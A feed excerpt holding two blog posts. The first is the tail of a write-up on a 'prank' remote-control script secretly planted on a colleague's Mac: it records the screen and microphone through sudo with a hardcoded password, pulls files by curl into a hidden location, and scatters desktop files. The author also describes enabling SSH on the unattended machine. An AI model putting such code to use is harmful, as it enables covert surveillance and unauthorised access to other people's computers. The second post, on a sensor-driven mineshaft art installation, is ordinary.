&lt;p&gt;Here we parse the parameters from the data sent. Data arrives in title_body_button1_button2 format, all separated by underscores. Then we format the &lt;code&gt;osascript&lt;/code&gt; command which displays the message dialog: we simply insert the parsed parameters into their designated places and execute the command.&lt;/p&gt;
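One fragile spot here is quoting: a stray double quote in the body would break the hand-built shell string. A sketch of a sturdier variant (the `build_dialog_script` helper is hypothetical, not part of the original script); passing the AppleScript as a single list argument to `osascript` avoids shell quoting entirely:

```python
import subprocess

def build_dialog_script(title, body, button1, button2):
    # hypothetical helper: assemble the AppleScript in one place
    return (f'display dialog "{body}" '
            f'buttons {{"{button1}", "{button2}"}} '
            f'with title "{title}"')

def message_dialog(title, body, button1, button2):
    script = build_dialog_script(title, body, button1, button2)
    # list form means no shell is involved, so nothing needs escaping
    subprocess.run(['osascript', '-e', script], capture_output=True)
```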

&lt;h4&gt;
  
  
  screen
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def recordScreen(client, data):
    items = data[16:].split('_')
    seconds = items[0]
    file = items[1]
    dir = os.getcwd()
    respond(client, 'recording...')
    command = 'echo "123" | sudo -S screencapture -g -V ' +seconds+ ' ' +dir+'/media/'+file
    subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Screen recording takes the number of seconds to record along with a filename, because the command otherwise does not know where to save the file. The &lt;code&gt;-V&lt;/code&gt; parameter sets the capture length in seconds, while &lt;code&gt;-g&lt;/code&gt; tells it to record audio from the microphone as well. Here we needed higher privileges, so the password is piped into &lt;code&gt;sudo -S&lt;/code&gt;, and we used &lt;code&gt;subprocess.Popen&lt;/code&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  set-bg
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def changeBackground(client, img):
    dir = os.getcwd()
    command = 'osascript -e \'tell application "Finder" to set desktop picture to POSIX file "' + dir + '/media/'+img+'"\''
    cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = "Background changed to " + img
    respond(client, output)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Change background gets the working directory, goes to the media folder, and sets the given image file as the background. The &lt;code&gt;osascript&lt;/code&gt; command is also predefined, and here we can see how the Python command filter pays off: we send &lt;code&gt;set-bg image.png&lt;/code&gt;, which is very readable and convenient, whereas &lt;code&gt;'osascript -e \'tell application "Finder" to set desktop picture to POSIX file "' + dir + '/media/'+img+'"\''&lt;/code&gt; is a bit less so.&lt;/p&gt;

&lt;h4&gt;
  
  
  upload
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
The upload command was parsed on the server side and sent out a curl command. Since we were on the same network as the client, we could reach ourselves easily. We started a local server with XAMPP, and within the htdocs folder we placed the files we wanted to deliver. Then we would send the command &lt;code&gt;sudo curl http://192.168.10.132:80/file.mp3 -o /secret/location/file.mp3&lt;/code&gt;, where 192.168.10.132 is the server's IP address. &lt;/p&gt;
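We used XAMPP, but Python's standard library can serve a folder just as well; a sketch (the port and folder layout are assumptions, not what we actually ran):

```python
import http.server
import socketserver
import threading

def serve_directory(port=8000):
    # serve the current working directory over HTTP, like XAMPP's htdocs;
    # port=0 asks the OS for any free port
    handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(('', port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd

# the client could then pull a file with:
#   curl http://SERVER_IP:8000/file.mp3 -o file.mp3
```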
&lt;h4&gt;
  
  
  folders
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#Running this script N times will create N depth of folder hiding
def randomizeDesktop(amount):
    p1 = randomName()
    randFold = p1.randomFolderName()

    cmd = subprocess.Popen('whoami', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output_bytes = cmd.stdout.read() + cmd.stderr.read()
    user = str(output_bytes, 'utf-8').rstrip()

    thingsToMoveAround = os.listdir('/Users/'+user+'/Desktop')
    folders = []

    #create random amount of folders
    for x in range(amount):
        folder = p1.randomFolderName()
        cmd = 'mkdir /Users/'+user+'/Desktop/' + folder
        os.system(cmd)
        folders.append(folder)

    #move all things found on desktop to random folders   
    for item in thingsToMoveAround:
        randomFolder = random.choice(folders)
        print('fold: '+randomFolder)
        print('item: '+item)
        cmd = 'mv /Users/'+user+'/Desktop/' + item + ' /Users/'+user+'/Desktop/' + randomFolder + '/' + item
        print(cmd)
        os.system(cmd)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This one is a bit more complicated than the others, but bear with me here. First, we initialize the randomName class. It contains a single function, randomFolderName(), which holds an array of about 1,000 folder names commonly found on disk and returns a random one. Then we run the &lt;code&gt;whoami&lt;/code&gt; command to find out the current user and append that to the path to the desktop. &lt;/p&gt;

&lt;p&gt;The &lt;code&gt;thingsToMoveAround&lt;/code&gt; variable lists the desktop items and puts them into an array so we can later move them into the new folders.&lt;/p&gt;

&lt;p&gt;The first for loop creates as many random folders as specified, using the &lt;code&gt;mkdir&lt;/code&gt; command. The next for loop goes through &lt;code&gt;thingsToMoveAround&lt;/code&gt; and moves each item into one of the created folders. &lt;/p&gt;

&lt;p&gt;This has a depth of 1, meaning there are no subfolders within the initial folders, but running the script N times creates N levels of nesting. This was uber fun, but also somewhat dangerous, because it has rage-quit potential and could end with possibly important files deleted from the desktop.&lt;/p&gt;
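For reference, here is a miniature sketch of what the randomName class looks like; the real one holds roughly 1,000 names, and this five-entry list is purely illustrative:

```python
import random

class randomName:
    # illustrative subset - the real class carries ~1000 plausible folder names
    FOLDER_NAMES = ['Library', 'Caches', 'Logs', 'Preferences', 'Support']

    def randomFolderName(self):
        # return one random, innocent-looking folder name
        return random.choice(self.FOLDER_NAMES)

p1 = randomName()
print(p1.randomFolderName())
```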

&lt;h4&gt;
  
  
  volume control
&lt;/h4&gt;

&lt;p&gt;Back to list of commands&lt;br&gt;
Volume control is part of the very useful osascript toolbox. &lt;code&gt;sudo osascript -e "set Volume 10"&lt;/code&gt; is all the magic you need to set someone's volume to maximum.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So I conclude that this was a very fun and interesting project. We've learned many new things: macOS internals, Python process control, command &amp;amp; control servers, etc. The hack was planted on our colleague's computer while he was on a lunch break: we activated SSH on his machine when he left, copied the script to a hidden location, and the game was on.&lt;/p&gt;

&lt;p&gt;We had some difficulties because macOS has odd default privileges, such as not granting the Terminal full disk access. This left us completely in the dark regarding the filesystem, well, for most of the time. We could navigate around using &lt;code&gt;cd&lt;/code&gt;, but we never knew where to go because &lt;code&gt;ls&lt;/code&gt; was not working. We later realized there is a Shared user whose directories we had permission to enter and list, so we nested our script and media there. &lt;/p&gt;

&lt;p&gt;Life tip: "Never leave your computer unlocked in a room full of young developers."&lt;/p&gt;

&lt;p&gt;.&lt;br&gt;
.&lt;br&gt;
.&lt;/p&gt;

&lt;p&gt;Thank you for reading this! If you've found this interesting, consider leaving a ❤️ &amp;amp; 🦄, and of course, share and comment your thoughts!&lt;/p&gt;

&lt;p&gt;Lloyds is available for partnerships and open for new projects. If you want to know more about us, click &lt;a href="https://lloyds-digital.com/"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Also, don’t forget to follow us on &lt;a href="https://www.instagram.com/lloyds.digital/"&gt;Instagram&lt;/a&gt; and &lt;a href="https://www.facebook.com/lloydsdigital"&gt;Facebook&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>hack</category>
      <category>python</category>
      <category>ssh</category>
      <category>prank</category>
    </item>
    <item>
      <title>Underground Weather Station (Digital art)</title>
      <dc:creator>Tomas Martincic</dc:creator>
      <pubDate>Wed, 07 Jul 2021 06:35:22 +0000</pubDate>
      <link>https://forem.com/martincic/underground-weather-station-digital-art-365i</link>
      <guid>https://forem.com/martincic/underground-weather-station-digital-art-365i</guid>
      <description>&lt;p&gt;I like my code in either of the following two states: semantic, efficient, and minimalistic &lt;strong&gt;OR&lt;/strong&gt; straight up Mad Max/MacGyver style duct-taping everything together. This integration is the latter. &lt;/p&gt;

&lt;p&gt;This project is a modern art installation combining technology and our town's historical heritage, &lt;a href="https://www.google.com/search?q=Labin+%22%C5%A1oht%22&amp;amp;tbm=isch&amp;amp;ved=2ahUKEwiWv9LflZzxAhV97OAKHezJA4QQ2-cCegQIABAA&amp;amp;oq=Labin+%22%C5%A1oht%22&amp;amp;gs_lcp=CgNpbWcQAzIECAAQHjoECCMQJzoCCAA6BggAEAgQHjoECAAQGFDvAljNHGCVIGgAcAB4AIABpgGIAYwIkgEDMC44mAEAoAEBqgELZ3dzLXdpei1pbWfAAQE&amp;amp;sclient=img&amp;amp;ei=oPDJYJbvPP3Ygwfsk4-gCA&amp;amp;bih=704&amp;amp;biw=1536&amp;amp;rlz=1C1GCEA_enHR913HR914" rel="noopener noreferrer"&gt;an old mineshaft in the center of our town&lt;/a&gt;. The main idea was to create a display that would mirror the mineshaft's "breathing": the display visually alters upon environmental changes within the mineshaft. The official name was "mine ultrasound". The main technical challenge was to lower the instruments into the mineshaft and retrieve the data in real time. PoE (Power over Ethernet) was the first idea, but we realized it suffers significant losses over greater distances, and as we required 150-200 meters, it wasn't a suitable solution. Instead we lowered 240V cables, which don't suffer meaningful power loss over such distances, and transferred the data wirelessly using nRF24L01+ modules. The monitoring ran for more than 30 days. In this blog, I will show you how I imagined the implementation, and I'll gladly take/challenge any of your suggestions.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Last second fixes on Master in actual mineshaft on top of mineshaft hole.&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fteqe37wvzweeqkoarqk9.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fteqe37wvzweeqkoarqk9.jpg" alt="Last second fixes on master in actual mineshaft"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;The final product, custom fluid digital art based on our historical heritage.&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygs45zyfzsimqih4jrry.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygs45zyfzsimqih4jrry.jpg" alt="Final product"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Table of contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Hardware/Software stack&lt;/li&gt;
&lt;li&gt;Technical Project overview&lt;/li&gt;
&lt;li&gt;Slave&lt;/li&gt;
&lt;li&gt;Master&lt;/li&gt;
&lt;li&gt;Display&lt;/li&gt;
&lt;li&gt;Custom TCP protocol&lt;/li&gt;
&lt;li&gt;Bonus&lt;/li&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
  
  
  Hardware/Software stack
&lt;/h2&gt;

&lt;p&gt;The project in question is composed of the following hardware: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;2x Raspberry Pi (4B &amp;amp; 3B+)&lt;/li&gt;
&lt;li&gt;2x nRF24L01+ (2.4GHz Transceiver)&lt;/li&gt;
&lt;li&gt;MCP9808 (I2C temperature sensor)&lt;/li&gt;
&lt;li&gt;SHT21 (Temperature/Humidity Sensor)&lt;/li&gt;
&lt;li&gt;BMP280 (I2C pressure sensor)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;And the following languages and tools:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Python&lt;/li&gt;
&lt;li&gt;PHP&lt;/li&gt;
&lt;li&gt;Bash&lt;/li&gt;
&lt;li&gt;MariaDB&lt;/li&gt;
&lt;li&gt;JavaScript&lt;/li&gt;
&lt;li&gt;HTML/CSS&lt;/li&gt;
&lt;li&gt;Bunch of helper libraries&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;
  
  
  nRF24L01+
&lt;/h3&gt;

&lt;p&gt;The nRF24L01+ PA/LNA module has a documented range of 1 km+ with a direct line of sight, and environmental tests show at least 250 m. Since this project sits underground with almost zero RF interference, I believe that anyone recreating something similar from this post could push the module to its full potential.&lt;/p&gt;
&lt;h2&gt;
  
  
  Technical Project Overview
&lt;/h2&gt;

&lt;p&gt;The project used a Master-Slave setup to achieve asymmetric communication between the devices. Both setups ran Raspbian OS because nothing more was required, and it was pretty simple to set up using &lt;a href="https://projects.raspberrypi.org/en/projects/noobs-install" rel="noopener noreferrer"&gt;NOOBS&lt;/a&gt;. I will start from the bottom of the mineshaft, and we'll work our way up all the way to "the cloud". I will not dive into the code itself within this post but you can check it out on  &lt;a href="https://github.com/Martincic/kova-je-nasa/" rel="noopener noreferrer"&gt;github.com/Martincic/kova-je-nasa&lt;/a&gt;. Instead, I will explain roughly how the whole setup worked and how technologies intertwined. &lt;/p&gt;
&lt;h2&gt;
  
  
  Slave - the bottom of the pit
&lt;/h2&gt;

&lt;p&gt;The slave was the Raspberry Pi 3B+, which collected the data from the sensors upon the master's request. The language of choice here was Python due to its simplicity, speed, and brilliant libraries for all the sensors and the nRF24L01+. &lt;/p&gt;

&lt;p&gt;The setup had to run the Python script from boot onwards, but since long-running Python processes are known to crash, I hacked my way around this. Firstly, I made a simple foreverPy.sh script which owns the slave.py process and, upon its failure, simply restarts it. This is the best way to own a process and control it in case of a shutdown; it contains the following code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;until sudo python3 /home/pi/slave.py; do
    echo 'Python process crashed... restarting...' &amp;gt;&amp;amp;2
    sleep 3
done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There is a sleep command before restarting the process, which acts as a buffer: if there were a critical mistake in the code, the process would fail on every run attempt, and without the pause it would flood your console so you couldn't stop the script.&lt;br&gt;
&lt;code&gt;&amp;gt;&amp;amp;2&lt;/code&gt; redirects the echo output from stdout (standard output) to stderr (standard error), so the restart notice travels on the error stream instead of being mixed into normal output.&lt;/p&gt;
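For comparison, the same keep-alive pattern can be sketched in Python (the `run_forever` helper is illustrative; we actually used the bash script above):

```python
import subprocess
import time

def run_forever(command, delay=3):
    # restart the child whenever it exits with a non-zero status,
    # mirroring the bash until-loop; a clean exit stops the supervision
    while True:
        result = subprocess.run(command, shell=True)
        if result.returncode == 0:
            break
        print('Python process crashed... restarting...')
        time.sleep(delay)  # buffer so a permanently broken script cannot flood the console
```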

&lt;p&gt;Finally, after owning the Python process and making sure it cannot fail, I had to start it whenever the machine starts. I achieved this by modifying the .bashrc file, found at &lt;code&gt;/home/pi/.bashrc&lt;/code&gt;. At the bottom of this "user boot" file we add the command that runs &lt;code&gt;foreverPy.sh&lt;/code&gt;: &lt;code&gt;sudo bash /home/pi/foreverPy.sh&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;
  
  
  Master - brains of the operation
&lt;/h2&gt;

&lt;p&gt;Master is the mediator between the cloud and the slave in the pit. It has the same keep-alive setup for running the Python script forever. The master asks the slave for data, receives it, reconstructs it from bytes into interpretable numbers, and sends it to the server's API for further use. Along with retrieving data and passing it along the line, the master is also connected to the TV, displaying the graph with "floating dots/graphs in various colors and speeds". After a lot of thought on how to display the graphics, and after passing over a ton of packages/libraries/programs, I decided to output it as a web page. This allows anyone with a mobile device, tablet, laptop, etc. to view the live ultrasound of the mineshaft from the comfort of their home; a great contributor to that decision was the ongoing pandemic, which limited visitors. After figuring out how to display it, the setup on the master was simple: start the browser on boot and hide the mouse cursor. Going back to the .bashrc file where we started foreverPy.sh, we add two more lines below it. &lt;code&gt;chromium-browser --app=http://some-website.com --start-fullscreen&lt;/code&gt; opens the Chromium web browser at the desired website in fullscreen mode, and &lt;code&gt;unclutter -idle 1 -root&lt;/code&gt; hides the mouse cursor after one second of idling. &lt;code&gt;unclutter&lt;/code&gt; is a package that can be installed on Debian-based distributions with &lt;code&gt;apt-get install unclutter&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;
  
  
  Display
&lt;/h2&gt;

&lt;p&gt;This was the most intimidating part of the project for me since I'm a backend developer and the best thing I've ever designed was probably the plasticine ashtrays in kindergarten. There were a couple of prerequisites for this: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It had to be programmatic art&lt;/li&gt;
&lt;li&gt;It had to have input variables&lt;/li&gt;
&lt;li&gt;Should not be repetitive &lt;/li&gt;
&lt;li&gt;Should be able to graph the data over it &lt;/li&gt;
&lt;li&gt;Have it run at a reasonable speed &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Since the Raspberry Pi isn't exactly a supercomputer, the last point was tough to satisfy. These were big tasks to overcome, but after lengthy research I found a brilliant JavaScript library called &lt;a href="https://vincentgarreau.com/particles.js/" rel="noopener noreferrer"&gt;particles.js&lt;/a&gt;. It allowed me to create random-enough graphics at a low processing cost; the randomness was modulated by the latest inputs from the mineshaft (e.g. the warmer the mine, the faster the particles). Moreover, it let me draw other things above the particles, such as graphs, company stamps, the last read date, the current data, etc. The only problem with the library was that you couldn't alter the parameters retroactively: it takes input parameters on load, and that is it. This was solved by a simple JavaScript hack which refreshed the page every 90 seconds (roughly the refresh rate of data from the mineshaft).&lt;/p&gt;

&lt;p&gt;Once the page refreshes, PHP feeds the latest records into particles.js and displays them. It felt like cheating, but if it works, it ain't stupid. Ninety seconds was enough for the data to refresh and gave the animation enough fluidity that it didn't look bugged out to anyone watching.&lt;/p&gt;
&lt;h2&gt;
  
  
  Custom TCP Protocol
&lt;/h2&gt;

&lt;p&gt;For this part of my implementation, I've used another &lt;a href="https://circuitpython-nrf24l01.readthedocs.io/en/latest/greetings.html" rel="noopener noreferrer"&gt;great library from the CircuitPython&lt;/a&gt; ecosystem. It has great documentation and comes with lots of examples. The communication between the two nRF24L01+ modules was designed this way because I wanted the master to be only in transmit mode and the slave only in receive mode. This was due to random crashes: I wanted them to be completely independent of each other, no matter at which moment one of them falls asleep (read: crashes) or wakes up.&lt;/p&gt;

&lt;p&gt;Traditional communication would require the master and the slave to switch between TX (transmit) and RX (receive) modes all the time. After any packet is received, there is an ACK (acknowledgement) packet which is sent from the receiver to the transmitter. Imagine a conversation where those &lt;code&gt;mhmms&lt;/code&gt; and &lt;code&gt;uhmms&lt;/code&gt; were mandatory for communication, and if you don't hear &lt;code&gt;mhmm&lt;/code&gt; after each sentence, you would repeat the sentence until you get one, or you get bored repeating it.&lt;/p&gt;

&lt;p&gt;With all this switching of modes, there is a lot of room for error when the system is unreliable: sooner or later both would end up stuck in RX mode, waiting for one another indefinitely.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Custom TCP protocol diagram&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhjezs68l8usjoofkellt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhjezs68l8usjoofkellt.png" alt="Custom TCP Protocol"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So what I did was set the master to TX and give it an array of questions, a simple string array. Then, in a while-true loop, I go through each of the questions and send it to the slave. The slave at the other end is always in RX, waiting for a question and ready to respond; it also has an associative array (unlike the plain array on the master) which maps each question to its value (e.g. &lt;code&gt;'temp' =&amp;gt; 22.1, 'humid' =&amp;gt; 79.9, 'press' =&amp;gt; 1011.1&lt;/code&gt;). Since the slave sends an ACK for every received message anyway, I simply look up my map of answers before sending it and attach the answer for that question (e.g. I receive 'temp' and in the ACK I send &lt;code&gt;answer_array&lt;/code&gt; at position &lt;code&gt;received_value&lt;/code&gt; back to the master). This cut the number of packets in half and greatly reduced the room for error. After each answered question, I refresh the answers array with fresh data, so the next question is always answered with the latest value.&lt;/p&gt;
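The question/answer-in-ACK exchange can be simulated without any radio hardware; a sketch of the logic only (the function names are illustrative, not the nRF24L01 library's API):

```python
# master side: a plain list of questions, polled in order
questions = ['temp', 'humid', 'press']

# slave side: associative array mapping each question to its latest reading
answers = {'temp': 22.1, 'humid': 79.9, 'press': 1011.1}

def slave_ack(question):
    # the slave piggybacks the answer onto the ACK it has to send anyway
    return answers.get(question)

def master_poll():
    # one packet out (the question), one packet back (the ACK payload)
    return {q: slave_ack(q) for q in questions}

print(master_poll())
```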

&lt;p&gt;With this setup, since the master is always, and the only one, in TX mode, nobody complains if nothing gets sent around. On the other side, the slave is always, and the only one, in RX mode, and the master simply ignores timed-out packets by default. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;Testing environment for custom packets&lt;/em&gt;&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjjcwds4gu6swfvl59ms5.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjjcwds4gu6swfvl59ms5.jpg" alt="Photo of setup communicating in my bedroom"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Bonus
&lt;/h2&gt;

&lt;p&gt;Along with the simple data that amounted to a couple of bytes altogether, I also had an idea for a coal-mine live stream. The idea was the following: since we're lowering the Raspberry down to a chamber where miners had telephones and other equipment, and since we're pulling down a 240V cable, we could have connected multiple light bulbs to the 240V supply and controlled them with a 5V relay from the Raspberry. The problem was that the image the Raspberry would take with the Pi Camera would appear static (always the same), but this could have been solved with a tiny servo motor, or simply by hanging the Pi in the air: it would certainly sway at random because of the strong air currents going through the mineshaft. This part was discarded, but I'll post it here anyway as a bonus.&lt;/p&gt;

&lt;p&gt;Photos from roughly 150 meters below the surface. The quality is pretty bad since it's pitch black down there, and any light we had was not sufficient for a mobile camera. &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/392bmphjil6tex2czigt.jpg" rel="noopener noreferrer"&gt;Telephone&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jqjj9949agsr2im3j28p.jpg" rel="noopener noreferrer"&gt;Electric cupboard left&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jqklf75fnhp4cybsozg3.jpg" rel="noopener noreferrer"&gt;Electric cupboard right&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0624q6ky2pdm4gazs1cq.jpg" rel="noopener noreferrer"&gt;Behind this door is an elevator through which we lowered the slave Raspberry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2wmxofsuzbqa8nsm9v0h.jpg" rel="noopener noreferrer"&gt;Closed off, collapsed tunnel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l0hqvos7ym3v0wxki28y.jpg" rel="noopener noreferrer"&gt;Coal veins&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  What's wrong with you???
&lt;/h3&gt;

&lt;p&gt;Here is the log I recorded at the time; it is obvious that acknowledging every packet made it take far too long to transmit any useful file size.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;13:53 - start transmission&lt;/li&gt;
&lt;li&gt;14:03 - ongoing, 0.9 MB sent&lt;/li&gt;
&lt;li&gt;14:28 - ongoing, 2.1 MB sent&lt;/li&gt;
&lt;li&gt;14:35 - ongoing, 2.5 MB sent&lt;/li&gt;
&lt;li&gt;14:45 - end transmission, 2.6 MB sent&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After lots of testing and talking to the CircuitPython developers, we concluded that Python was not the tool for the task; the only real fix would have been translating all the code to C++, which was not a viable option. Until it hit me: should I use a streaming protocol rather than an ACK protocol and send a slow video? I figured that in the capital of Croatia there is much more RF interference than a couple of hundred meters deep in a mineshaft in the small town of Labin. That hope turned out to be false: photos from the Pi Camera V2 still took about 10 minutes per transmission (I forgot to note the exact measurements), let alone one per second.&lt;/p&gt;

&lt;p&gt;Before the actual transmission, I broke the image down into a byte array in the following manner:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   buffers = []
    with open("coal.jpeg", "rb") as image:
      f = image.read()      
      b = bytearray(binascii.hexlify(f))

    counter = 0
    while counter &amp;lt; sys.getsizeof(b):
        counter += 32
        if not counter &amp;gt; sys.getsizeof(b):
            buffers.append(b[counter:counter+32])
    return buffers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this code snippet, &lt;code&gt;counter += 32&lt;/code&gt; advances by the size of a single packet, which I've set to 32 bytes, the nRF24L01+'s maximum payload size. After deconstructing the image into the buffer, I sent it over to the master, where I had to reconstruct it in the following manner:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;f = open("image.jpeg", 'wb')
while time.monotonic() &amp;lt; start_timer + timeout:
        if nrf.available():
            count += 1
            # retreive the received packet's payload
            buffer = nrf.read()  # clears flags &amp;amp; empties RX FIFO
            bytes += buffer
            f.write(binascii.unhexlify(buffer))
            if count%1000 == 0:
                pass
            start_timer = time.monotonic()  # reset timer on every RX payload

    # recommended behavior is to keep in TX mode while idle
    nrf.listen = False  # put the nRF24L01 is in TX mode
    f.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This writes every packet it receives to the .jpeg file, de-hexing (converting from hex back to binary) the payload along the way so the data is binary again.&lt;/p&gt;
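The whole pipeline, hexlify, chunk into 32-byte payloads, join and unhexlify on the far end, can be verified on any machine without the radios; a minimal round-trip sketch:

```python
import binascii

def to_buffers(raw):
    # hex-encode, then split into 32-byte chunks (nRF24L01+ max payload)
    b = bytearray(binascii.hexlify(raw))
    return [b[i:i + 32] for i in range(0, len(b), 32)]

def from_buffers(buffers):
    # concatenate the received payloads and de-hex back to binary
    return binascii.unhexlify(b''.join(bytes(buf) for buf in buffers))

original = b'any binary data, e.g. a JPEG'
assert from_buffers(to_buffers(original)) == original  # lossless round trip
```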

&lt;p&gt;This worked like a charm and here is the final result: &lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F067t31aqlpys7q0tufkp.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F067t31aqlpys7q0tufkp.jpeg" alt="Transmitted image with packet loss"&gt;&lt;/a&gt;&lt;br&gt;
I say it worked like a charm because once I've transmitted it, it was even better than I could have imagined. This is an art installation focused on mineshaft and if any static occurred it would too be random and created by mine itself, which really adds to the technical/artistic combination we were looking for.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So the project altogether was pretty exciting, and I've learned tons of new things. I was very fulfilled once it was done, because at moments I thought it was too big of a task. Still, some things could have gone better, such as forgetting to set up SSH access on the master (facepalm). Data was being sent way too fast, and I ended up filtering it on the server by accessing every Nth record. I also learned later that image transfers did not succeed every time: throughout the image files there are flags of some sort (I had originally thought images only had headers), and since this UDP-style streaming loses packets, the file would sometimes come out broken. Once we lowered the rig even those lousy 10 meters into the mineshaft, the first (apparently well-known) anomaly appeared: the temperature remained constant at 14 °C from the moment of insertion throughout the life of the project. The humidity sat at about 100% from insertion until the end and only kept climbing (the sensor even reported up to 115%), which wasn't very interesting. And then there was the pressure, which luckily was the only thing that fluctuated a little due to air 